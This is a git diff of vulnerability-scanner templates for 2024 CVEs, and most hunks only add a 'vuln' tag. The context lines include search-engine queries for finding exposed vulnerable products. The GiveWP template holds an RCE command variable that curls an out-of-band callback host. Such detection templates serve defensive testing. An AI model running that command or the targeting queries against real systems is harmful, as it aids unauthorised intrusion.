a/http/cves/2024/CVE-2024-6586.yaml b/http/cves/2024/CVE-2024-6586.yaml index fdf8850c868..3a5cedfa7ee 100644 --- a/http/cves/2024/CVE-2024-6586.yaml +++ b/http/cves/2024/CVE-2024-6586.yaml @@ -23,7 +23,7 @@ info: shodan-query: title:"Lightdash" vendor: lightdash product: lightdash - tags: cve,cve2024,lightdash,ssrf,oast,authenticated + tags: cve,cve2024,lightdash,ssrf,oast,authenticated,vuln flow: http(1) && http(2) && http(3) && http(4) && http(5) diff --git a/http/cves/2024/CVE-2024-6587.yaml b/http/cves/2024/CVE-2024-6587.yaml index 00e594f6d16..54de4b22259 100644 --- a/http/cves/2024/CVE-2024-6587.yaml +++ b/http/cves/2024/CVE-2024-6587.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:439373620 - tags: cve,cve2024,ssrf,openai,litellm,vkev + tags: cve,cve2024,ssrf,openai,litellm,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index e220c2ddf39..18f8f925a5e 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -24,7 +24,7 @@ info: fofa-query: title=="Netgear" product: wn604 vendor: netgear - tags: cve,cve2024,netgear + tags: cve,cve2024,netgear,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-6651.yaml b/http/cves/2024/CVE-2024-6651.yaml index 053f33217a2..c97c001fe8f 100644 --- a/http/cves/2024/CVE-2024-6651.yaml +++ b/http/cves/2024/CVE-2024-6651.yaml @@ -21,7 +21,7 @@ info: vendor: WordPress product: wp-file-upload fofa-query: body='wp-content/plugins/wp-file-upload/' - tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated + tags: cve,cve2024,wp,wordpress,wp-plugin,xss,wp-file-upload,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6670.yaml b/http/cves/2024/CVE-2024-6670.yaml index 5984683e0fc..6c1b173e447 100644 --- a/http/cves/2024/CVE-2024-6670.yaml +++ b/http/cves/2024/CVE-2024-6670.yaml @@ -24,7 +24,7 @@ info: shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 product: whatsup_gold vendor: progress - tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev,vkev + tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev,vkev,vuln flow: | http(1); diff --git a/http/cves/2024/CVE-2024-6746.yaml b/http/cves/2024/CVE-2024-6746.yaml index 78a13b137f7..48a6810e251 100644 --- a/http/cves/2024/CVE-2024-6746.yaml +++ b/http/cves/2024/CVE-2024-6746.yaml @@ -23,7 +23,7 @@ info: metadata: vendor: naibowang product: easyspider - tags: cve,cve2024,lfi,network + tags: cve,cve2024,lfi,network,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6781.yaml b/http/cves/2024/CVE-2024-6781.yaml index 372177c3ee7..c936d4583b2 100644 --- a/http/cves/2024/CVE-2024-6781.yaml +++ b/http/cves/2024/CVE-2024-6781.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 2 - tags: cve,cve2024,calibre,lfi + tags: cve,cve2024,calibre,lfi,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6782.yaml b/http/cves/2024/CVE-2024-6782.yaml index 19d74f48855..ebc0bbad665 100644 --- a/http/cves/2024/CVE-2024-6782.yaml +++ b/http/cves/2024/CVE-2024-6782.yaml @@ -19,7 +19,7 @@ info: shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 2 - tags: cve,cve2024,calibre,rce + tags: cve,cve2024,calibre,rce,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6842.yaml b/http/cves/2024/CVE-2024-6842.yaml index 2ed3a1eab47..188fe6ff683 100644 --- a/http/cves/2024/CVE-2024-6842.yaml +++ b/http/cves/2024/CVE-2024-6842.yaml @@ -24,7 +24,7 @@ info: vendor: Mintplex Labs product: anything-llm shodan-query: title:"AnythingLLM" - tags: cve,cve2024,unauth,exposure,anything-llm,mintplex-Labs + tags: cve,cve2024,unauth,exposure,anything-llm,mintplex-Labs,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-6845.yaml b/http/cves/2024/CVE-2024-6845.yaml index 8c4ff34c803..1d8d46f8174 100644 --- a/http/cves/2024/CVE-2024-6845.yaml +++ b/http/cves/2024/CVE-2024-6845.yaml @@ -21,7 +21,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/smartsearchwp" fofa-query: body="/wp-content/plugins/smartsearchwp" - tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp + tags: cve,cve2024,exposure,wp,wordpress,wp-plugin,smartsearchwp,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6846.yaml b/http/cves/2024/CVE-2024-6846.yaml index 3bae4a088e6..a3fb7a06d62 100644 --- a/http/cves/2024/CVE-2024-6846.yaml +++ b/http/cves/2024/CVE-2024-6846.yaml @@ -23,7 +23,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/smartsearchwp" fofa-query: body="/wp-content/plugins/smartsearchwp" - tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt + tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6886.yaml b/http/cves/2024/CVE-2024-6886.yaml index 081480028ee..0514a7f7a90 100644 --- a/http/cves/2024/CVE-2024-6886.yaml +++ b/http/cves/2024/CVE-2024-6886.yaml @@ -22,7 +22,7 @@ info: max-request: 4 vendor: gitea product: gitea - tags: cve,cve2024,gitea,xss,authenticated + tags: cve,cve2024,gitea,xss,authenticated,vuln variables: username: "{{username}}" diff --git a/http/cves/2024/CVE-2024-6892.yaml b/http/cves/2024/CVE-2024-6892.yaml index 47b92aa3e63..eb51dc9cb26 100644 --- a/http/cves/2024/CVE-2024-6892.yaml +++ b/http/cves/2024/CVE-2024-6892.yaml @@ -24,7 +24,7 @@ info: vendor: journyx product: journyx shodan-query: html:"Journyx" - tags: cve,cve2024,xss,journyx,seclists + tags: cve,cve2024,xss,journyx,seclists,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-6893.yaml b/http/cves/2024/CVE-2024-6893.yaml index 5dcf6e03617..0e4cc9c3520 100644 --- a/http/cves/2024/CVE-2024-6893.yaml +++ b/http/cves/2024/CVE-2024-6893.yaml @@ -23,7 +23,7 @@ info: vendor: journyx product: journyx-jtime fofa-query: icon_hash="-109972155" - tags: cve,cve2024,journyx,xxe,vkev + tags: cve,cve2024,journyx,xxe,vkev,vuln variables: pass: "{{rand_text_alpha(5)}}" diff --git a/http/cves/2024/CVE-2024-6911.yaml b/http/cves/2024/CVE-2024-6911.yaml index 4bc69c5f44b..39cdab3a85e 100644 --- a/http/cves/2024/CVE-2024-6911.yaml +++ b/http/cves/2024/CVE-2024-6911.yaml @@ -24,7 +24,7 @@ info: vendor: perkinelmer product: processplus fofa-query: '"Process Plus" && icon_hash="1772087922"' - tags: cve,cve2024,processplus,intrusive,lfi,seclists + tags: cve,cve2024,processplus,intrusive,lfi,seclists,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6922.yaml b/http/cves/2024/CVE-2024-6922.yaml index 8088fc23869..86e4fa68d22 100644 --- a/http/cves/2024/CVE-2024-6922.yaml +++ b/http/cves/2024/CVE-2024-6922.yaml @@ -23,7 +23,7 @@ info: fofa-query: icon_hash="-1005691603" product: automation_360 vendor: automationanywhere - tags: cve,cve2024,ssrf,oast,automation,anywhere + tags: cve,cve2024,ssrf,oast,automation,anywhere,vuln http: diff --git a/http/cves/2024/CVE-2024-6924.yaml b/http/cves/2024/CVE-2024-6924.yaml index 0f1e57fb259..5546bb4cc90 100644 --- a/http/cves/2024/CVE-2024-6924.yaml +++ b/http/cves/2024/CVE-2024-6924.yaml @@ -17,7 +17,7 @@ info: product: truebooker framework: wordpress publicwww-query: "/wp-content/plugins/truebooker-appointment-booking" - tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker + tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6926.yaml b/http/cves/2024/CVE-2024-6926.yaml index d52774695d7..bb29bccb5a9 100644 --- a/http/cves/2024/CVE-2024-6926.yaml +++ b/http/cves/2024/CVE-2024-6926.yaml @@ -23,7 +23,7 @@ info: product: viral-signup framework: wordpress publicwww-query: "/wp-content/plugins/viral-signup" - tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wordpress,viral-signup,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-6928.yaml b/http/cves/2024/CVE-2024-6928.yaml index a5c7075eda8..3ea63b9774d 100644 --- a/http/cves/2024/CVE-2024-6928.yaml +++ b/http/cves/2024/CVE-2024-6928.yaml @@ -22,7 +22,7 @@ info: product: opti-marketing framework: wordpress publicwww-query: "/wp-content/plugins/opti-marketing" - tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli + tags: time-based-sqli,cve,cve2024,wpscan,wp-plugin,wp,wordpress,opti-marketing,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7008.yaml b/http/cves/2024/CVE-2024-7008.yaml index c227d3de467..7976d76b28d 100644 --- a/http/cves/2024/CVE-2024-7008.yaml +++ b/http/cves/2024/CVE-2024-7008.yaml @@ -16,7 +16,7 @@ info: shodan-query: html:"Calibre" fofa-query: "Server: calibre" max-request: 1 - tags: cve,cve2024,calibre,xss + tags: cve,cve2024,calibre,xss,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7029.yaml b/http/cves/2024/CVE-2024-7029.yaml index 341a7cabb50..b6914ca77de 100644 --- a/http/cves/2024/CVE-2024-7029.yaml +++ b/http/cves/2024/CVE-2024-7029.yaml @@ -24,7 +24,7 @@ info: verified: true max-request: 1 fofa-query: body="AVTECH Software" - tags: cve,cve2024,avtech,rce,intrusive,vkev + tags: cve,cve2024,avtech,rce,intrusive,vkev,vuln variables: string: "{{randstr}}" diff --git a/http/cves/2024/CVE-2024-7097.yaml b/http/cves/2024/CVE-2024-7097.yaml index 364665b5591..16101f19018 100644 --- a/http/cves/2024/CVE-2024-7097.yaml +++ b/http/cves/2024/CVE-2024-7097.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 2 shodan-query: "WSO2 Carbon Server" - tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev + tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln variables: username: "{{randstr_1}}" diff --git a/http/cves/2024/CVE-2024-7120.yaml b/http/cves/2024/CVE-2024-7120.yaml index d14e9670e3e..2864a925500 100644 --- a/http/cves/2024/CVE-2024-7120.yaml +++ b/http/cves/2024/CVE-2024-7120.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 2 fofa-query: '"Web user login" && ""' - tags: cve,cve2024,intrusive,raisecom,rce,vkev + tags: cve,cve2024,intrusive,raisecom,rce,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7188.yaml b/http/cves/2024/CVE-2024-7188.yaml index a4fb1044bcf..bd9547ddca0 100644 --- a/http/cves/2024/CVE-2024-7188.yaml +++ b/http/cves/2024/CVE-2024-7188.yaml @@ -25,7 +25,7 @@ info: product: quicklancer shodan-query: http.favicon.hash:1099370896 fofa-query: icon_hash="1099370896" - tags: time-based-sqli,cve,cve2024,sqli,quicklancer + tags: time-based-sqli,cve,cve2024,sqli,quicklancer,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7313.yaml b/http/cves/2024/CVE-2024-7313.yaml index 17dcd261754..b36ed893072 100644 --- a/http/cves/2024/CVE-2024-7313.yaml +++ b/http/cves/2024/CVE-2024-7313.yaml @@ -25,7 +25,7 @@ info: fofa-query: body="wp-content/plugins/wp-simple-firewall/" google-query: inurl:"/wp-content/plugins/wp-simple-firewall/" shodan-query: 'wp-content/plugins/wp-simple-firewall/' - tags: cve,cve2024,wp,wordpress,xss,wp-plugin,authenticated,wp-simple-firewall + tags: cve,cve2024,wp,wordpress,xss,wp-plugin,authenticated,wp-simple-firewall,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7314.yaml b/http/cves/2024/CVE-2024-7314.yaml index 3ef577be3c4..7113a23f399 100644 --- a/http/cves/2024/CVE-2024-7314.yaml +++ b/http/cves/2024/CVE-2024-7314.yaml @@ -28,7 +28,7 @@ info: product: report fofa-query: app="AJ-Report" shodan-query: http.title:"AJ-Report" - tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev + tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7332.yaml b/http/cves/2024/CVE-2024-7332.yaml index a765407da36..0ad8771e5fc 100644 --- a/http/cves/2024/CVE-2024-7332.yaml +++ b/http/cves/2024/CVE-2024-7332.yaml @@ -24,7 +24,7 @@ info: vendor: totolink product: cp450_firmware fofa-query: title="totolink" - tags: cve,cve2024,totolink + tags: cve,cve2024,totolink,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-7339.yaml b/http/cves/2024/CVE-2024-7339.yaml index da776e52fa4..21ff28c61a8 100644 --- a/http/cves/2024/CVE-2024-7339.yaml +++ b/http/cves/2024/CVE-2024-7339.yaml @@ -26,7 +26,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,dvr,tvt,info-leak,vkev + tags: cve,cve2024,dvr,tvt,info-leak,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7340.yaml b/http/cves/2024/CVE-2024-7340.yaml index 80f236a1823..39360a90eee 100644 --- a/http/cves/2024/CVE-2024-7340.yaml +++ b/http/cves/2024/CVE-2024-7340.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,lfr,weave,wandb + tags: cve,cve2024,lfr,weave,wandb,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7354.yaml b/http/cves/2024/CVE-2024-7354.yaml index f530d59fd7b..3c660d1a3e0 100644 --- a/http/cves/2024/CVE-2024-7354.yaml +++ b/http/cves/2024/CVE-2024-7354.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="/wp-content/plugins/ninja-forms" publicwww-query: /wp-content/plugins/ninja-forms/ shodan-query: http.html:"/wp-content/plugins/ninja-forms/" - tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated + tags: cve,cve2024,wp,wordpress,wp-plugin,ninja-forms,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7399.yaml b/http/cves/2024/CVE-2024-7399.yaml index 80949002a55..79d81686d8c 100644 --- a/http/cves/2024/CVE-2024-7399.yaml +++ b/http/cves/2024/CVE-2024-7399.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 shodan-query: 'Server: MagicInfo Premium Server' - tags: cve,cve2024,rce,magicinfo,samsung,file-upload,intrusive,vkev + tags: cve,cve2024,rce,magicinfo,samsung,file-upload,intrusive,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7591.yaml b/http/cves/2024/CVE-2024-7591.yaml index 9f80371cfd8..eef7f616e2b 100644 --- a/http/cves/2024/CVE-2024-7591.yaml +++ b/http/cves/2024/CVE-2024-7591.yaml @@ -25,7 +25,7 @@ info: product: loadmaster max-request: 2 shodan-query: html:"Kemp Login Screen" - tags: cve,cve2024,loadmaster,rce,oast,kemptechnologies + tags: cve,cve2024,loadmaster,rce,oast,kemptechnologies,vuln variables: oast: ".{{interactsh-url}}" diff --git a/http/cves/2024/CVE-2024-7593.yaml b/http/cves/2024/CVE-2024-7593.yaml index 1380065881e..bffcfa3c03f 100644 --- a/http/cves/2024/CVE-2024-7593.yaml +++ b/http/cves/2024/CVE-2024-7593.yaml @@ -27,7 +27,7 @@ info: shodan-query: - http.favicon.hash:1862800928 - html:"apps/zxtm/login.cgi" - tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev,vkev + tags: packetstorm,cve2024,cve,auth-bypass,ivanti,intrusive,kev,vkev,vuln flow: http(1) && http(2) variables: diff --git a/http/cves/2024/CVE-2024-7714.yaml b/http/cves/2024/CVE-2024-7714.yaml index 4140be71b79..e1c6a258ccf 100644 --- a/http/cves/2024/CVE-2024-7714.yaml +++ b/http/cves/2024/CVE-2024-7714.yaml @@ -24,7 +24,7 @@ info: product: ays-chatgpt-assistant framework: wordpress publicwww-query: "/wp-content/plugins/ays-chatgpt-assistant" - tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac + tags: cve,cve2024,ays-chatgpt-assistant,wordpress,wp-plugin,wp,iac,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-7786.yaml b/http/cves/2024/CVE-2024-7786.yaml index fc2c79a5f54..1d9417d96e5 100755 --- a/http/cves/2024/CVE-2024-7786.yaml +++ b/http/cves/2024/CVE-2024-7786.yaml @@ -24,7 +24,7 @@ info: framework: wordpress publicwww-query: "/wp-content/plugins/sensei-lms" fofa-query: body="/wp-content/plugins/sensei-lms" - tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev + tags: cve,cve2024,wpscan,wp,wp-plugin,wordpress,sensei-lms,exposure,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7854.yaml b/http/cves/2024/CVE-2024-7854.yaml index 5b75d10bf99..0a25fbf8890 100644 --- a/http/cves/2024/CVE-2024-7854.yaml +++ b/http/cves/2024/CVE-2024-7854.yaml @@ -25,7 +25,7 @@ info: product: woo_inquiry framework: wordpress publicwww-query: "/wp-content/plugins/woo-inquiry" - tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry + tags: time-based-sqli,cve,cve2024,wp,wordpress,wp-plugin,sqli,woo-inquiry,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-7928.yaml b/http/cves/2024/CVE-2024-7928.yaml index 0ed89288a71..44f92f1c8e8 100644 --- a/http/cves/2024/CVE-2024-7928.yaml +++ b/http/cves/2024/CVE-2024-7928.yaml @@ -23,7 +23,7 @@ info: vendor: fastadmin product: fastadmin fofa-query: icon_hash="-1036943727" - tags: cve,cve2024,fastadmin,lfi,vkev + tags: cve,cve2024,fastadmin,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-7954.yaml b/http/cves/2024/CVE-2024-7954.yaml index 15cadb6388f..989245c7d8b 100644 --- a/http/cves/2024/CVE-2024-7954.yaml +++ b/http/cves/2024/CVE-2024-7954.yaml @@ -24,7 +24,7 @@ info: vendor: spip product: spip fofa-query: app="SPIP" - tags: cve,cve2024,spip,rce,vkev + tags: cve,cve2024,spip,rce,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8021.yaml b/http/cves/2024/CVE-2024-8021.yaml index e8adc11358e..13584fbc68c 100644 --- a/http/cves/2024/CVE-2024-8021.yaml +++ b/http/cves/2024/CVE-2024-8021.yaml @@ -23,7 +23,7 @@ info: - body="__gradio_mode__" - title="gradio" google-query: intitle:"gradio" - tags: cve,cve2024,redirect,oast,gradio + tags: cve,cve2024,redirect,oast,gradio,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8181.yaml b/http/cves/2024/CVE-2024-8181.yaml index d99ad9d2002..2d4c46ea74c 100644 --- a/http/cves/2024/CVE-2024-8181.yaml +++ b/http/cves/2024/CVE-2024-8181.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-2051052918 fofa-query: title:"Flowise" - tags: tenable,cve,cve2024,flowise,auth-bypass,vkev + tags: tenable,cve,cve2024,flowise,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8353.yaml b/http/cves/2024/CVE-2024-8353.yaml index bde29e98c2d..2e902d02370 100644 --- a/http/cves/2024/CVE-2024-8353.yaml +++ b/http/cves/2024/CVE-2024-8353.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:"/wp-content/plugins/give/" fofa-query: body="/wp-content/plugins/give/" publicwww-query: "/wp-content/plugins/give/" - tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev + tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev,vuln variables: cmd: "curl+http://test.{{interactsh-url}}" diff --git a/http/cves/2024/CVE-2024-8425.yaml b/http/cves/2024/CVE-2024-8425.yaml index f45c0863b4a..c497b13dd8b 100644 --- a/http/cves/2024/CVE-2024-8425.yaml +++ b/http/cves/2024/CVE-2024-8425.yaml @@ -24,7 +24,7 @@ info: vendor: wpswings product: woocommerce_ultimate_gift_card fofa-query: body="/wp-content/plugins/woocommerce-ultimate-gift-card" - tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev + tags: cve,cve2024,wp,wp-plugin,wordpress,woocommerce,woocommerce-ultimate-gift-card,file-upload,vkev,vuln variables: filename: "{{rand_base(7)}}.txt" diff --git a/http/cves/2024/CVE-2024-8484.yaml b/http/cves/2024/CVE-2024-8484.yaml index 62f34f2395d..118ffb8fd93 100644 --- a/http/cves/2024/CVE-2024-8484.yaml +++ b/http/cves/2024/CVE-2024-8484.yaml @@ -26,7 +26,7 @@ info: product: rest-api-to-miniprogram framework: wordpress publicwww-query: "/wp-content/plugins/rest-api-to-miniprogram" - tags: time-based-sqli,cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram + tags: time-based-sqli,cve,cve2024,wp,wp-plugin,wordpress,sqli,miniprogram,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8503.yaml b/http/cves/2024/CVE-2024-8503.yaml index 970ca79ce94..f7c325c8d6b 100644 --- a/http/cves/2024/CVE-2024-8503.yaml +++ b/http/cves/2024/CVE-2024-8503.yaml @@ -23,7 +23,7 @@ info: vendor: vicidial product: vicidial fofa-query: icon_hash="1375401192" - tags: time-based-sqli,cve,cve2024,vicidial,sqli,vkev + tags: time-based-sqli,cve,cve2024,vicidial,sqli,vkev,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8517.yaml b/http/cves/2024/CVE-2024-8517.yaml index 882d6cefb4b..d62e3e30838 100644 --- a/http/cves/2024/CVE-2024-8517.yaml +++ b/http/cves/2024/CVE-2024-8517.yaml @@ -24,7 +24,7 @@ info: max-request: 2 shodan-query: http.favicon.hash:-1224668706 fofa-query: "X-Spip-Cache" - tags: cve,cve2024,intrusive,spip,rce + tags: cve,cve2024,intrusive,spip,rce,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8522.yaml b/http/cves/2024/CVE-2024-8522.yaml index 88081a5f3ea..421971cc31b 100644 --- a/http/cves/2024/CVE-2024-8522.yaml +++ b/http/cves/2024/CVE-2024-8522.yaml @@ -25,7 +25,7 @@ info: product: learnpress shodan-query: html:"/wp-content/plugins/learnpress" fofa-query: body="/wp-content/plugins/learnpress" - tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,vkev + tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8529.yaml b/http/cves/2024/CVE-2024-8529.yaml index dbf958a8ffe..eef9ae1a555 100644 --- a/http/cves/2024/CVE-2024-8529.yaml +++ b/http/cves/2024/CVE-2024-8529.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="wp-content/plugins/learnpress" vendor: thimpress product: learnpress - tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev + tags: cve,cve2024,wordpress,wp-plugin,wp,learnpress,sqli,time-based-sqli,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8673.yaml b/http/cves/2024/CVE-2024-8673.yaml index b1fb877f084..6134a085101 100644 --- a/http/cves/2024/CVE-2024-8673.yaml +++ b/http/cves/2024/CVE-2024-8673.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 5 framework: wordpress - tags: cve,cve2024,wpscan,wp-plugin,wp,authenticated,wordpress,z-downloads + tags: cve,cve2024,wpscan,wp-plugin,wp,authenticated,wordpress,z-downloads,vuln flow: http(1) && http(2) diff --git a/http/cves/2024/CVE-2024-8698.yaml b/http/cves/2024/CVE-2024-8698.yaml index 279606e5cf8..69c99a71b3a 100644 --- a/http/cves/2024/CVE-2024-8698.yaml +++ b/http/cves/2024/CVE-2024-8698.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.favicon.hash:"-1105083093" fofa-query: icon_hash=-1105083093 google-query: intitle:"keycloak" - tags: cve,cve2024,keycloak,saml,signature + tags: cve,cve2024,keycloak,saml,signature,vuln variables: AUTH_SESSION_ID_LEGACY: "{{auth_cookie}}" # Cookie of the valid SAMLResponse message diff --git a/http/cves/2024/CVE-2024-8752.yaml b/http/cves/2024/CVE-2024-8752.yaml index 456bed1545d..6fa0dfe73cf 100644 --- a/http/cves/2024/CVE-2024-8752.yaml +++ b/http/cves/2024/CVE-2024-8752.yaml @@ -21,7 +21,7 @@ info: vendor: webiq product: webiq shodan-query: title:"WebIQ" - tags: cve,cve2024,webiq,lfi,vkev + tags: cve,cve2024,webiq,lfi,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8856.yaml b/http/cves/2024/CVE-2024-8856.yaml index 290592945c0..0a1b8c7c05f 100644 --- a/http/cves/2024/CVE-2024-8856.yaml +++ b/http/cves/2024/CVE-2024-8856.yaml @@ -25,7 +25,7 @@ info: max-request: 2 fofa-query: body="/wp-content/plugins/wp-time-capsule/" publicwww-query: "/wp-content/plugins/wp-time-capsule/" - tags: cve,cve2024,intrusive,file-upload,wordpress,wp-plugin,wp,wp-time-capsule,rce,vkev + tags: cve,cve2024,intrusive,file-upload,wordpress,wp-plugin,wp,wp-time-capsule,rce,vkev,vuln variables: marker: "{{randstr}}" diff --git a/http/cves/2024/CVE-2024-8859.yaml b/http/cves/2024/CVE-2024-8859.yaml index d1b33fcedc3..78d26999454 100644 --- a/http/cves/2024/CVE-2024-8859.yaml +++ b/http/cves/2024/CVE-2024-8859.yaml @@ -25,7 +25,7 @@ info: fofa-query: - title="mlflow" - app="mlflow" - tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects + tags: cve2024,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-8877.yaml b/http/cves/2024/CVE-2024-8877.yaml index 30a2b6cd07f..3c80598fc7e 100644 --- a/http/cves/2024/CVE-2024-8877.yaml +++ b/http/cves/2024/CVE-2024-8877.yaml @@ -27,7 +27,7 @@ info: fofa-query: title="netman 204" censys-query: services.http.response.body:"netman204" google-query: intitle:"netman 204" - tags: cve,cve2024,netman,sqli,vkev + tags: cve,cve2024,netman,sqli,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-8883.yaml b/http/cves/2024/CVE-2024-8883.yaml index 68e2baac63d..844c903b64b 100644 --- a/http/cves/2024/CVE-2024-8883.yaml +++ b/http/cves/2024/CVE-2024-8883.yaml @@ -20,7 +20,7 @@ info: max-request: 1 verified: true shodan-query: title:"keycloak" - tags: cve,cve2024,keycloak,redirect + tags: cve,cve2024,keycloak,redirect,vuln variables: redirect_uri: "oast.me" diff --git a/http/cves/2024/CVE-2024-8963.yaml b/http/cves/2024/CVE-2024-8963.yaml index a917354597f..425cd03902a 100644 --- a/http/cves/2024/CVE-2024-8963.yaml +++ b/http/cves/2024/CVE-2024-8963.yaml @@ -28,7 +28,7 @@ info: - http.title:"landesk(r) cloud services appliance" fofa-query: title="landesk(r) cloud services appliance" google-query: intitle:"landesk(r) cloud services appliance" - tags: cve,cve2024,ivanti,kev,vkev + tags: cve,cve2024,ivanti,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2024/CVE-2024-9007.yaml b/http/cves/2024/CVE-2024-9007.yaml index 81f10d197fe..65fff9a84d8 100644 --- a/http/cves/2024/CVE-2024-9007.yaml +++ b/http/cves/2024/CVE-2024-9007.yaml @@ -28,7 +28,7 @@ info: product: 123solar fofa-query: title="123Solar" shodan-query: title:"123Solar" - tags: cve,cve2024,xss,123solar + tags: cve,cve2024,xss,123solar,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9014.yaml b/http/cves/2024/CVE-2024-9014.yaml index 43205e375ab..0a5236b936d 100644 --- a/http/cves/2024/CVE-2024-9014.yaml +++ b/http/cves/2024/CVE-2024-9014.yaml @@ -23,7 +23,7 @@ info: vendor: pgadmin-org product: pgadmin4 fofa-query: "pgadmin4" - tags: cve,cve2024,pgadmin,exposure,auth-bypass,vkev + tags: cve,cve2024,pgadmin,exposure,auth-bypass,vkev,vuln http: - raw: diff --git a/http/cves/2024/CVE-2024-9047.yaml b/http/cves/2024/CVE-2024-9047.yaml index a49b2b424eb..f5c81a51769 100644 --- a/http/cves/2024/CVE-2024-9047.yaml +++ b/http/cves/2024/CVE-2024-9047.yaml @@ -29,7 +29,7 @@ info: shodan-query: http.html:"/wp-content/plugins/wp-file-upload/" fofa-query: body="/wp-content/plugins/wp-file-upload" publicwww-query: /wp-content/plugins/wp-file-upload/ - tags: 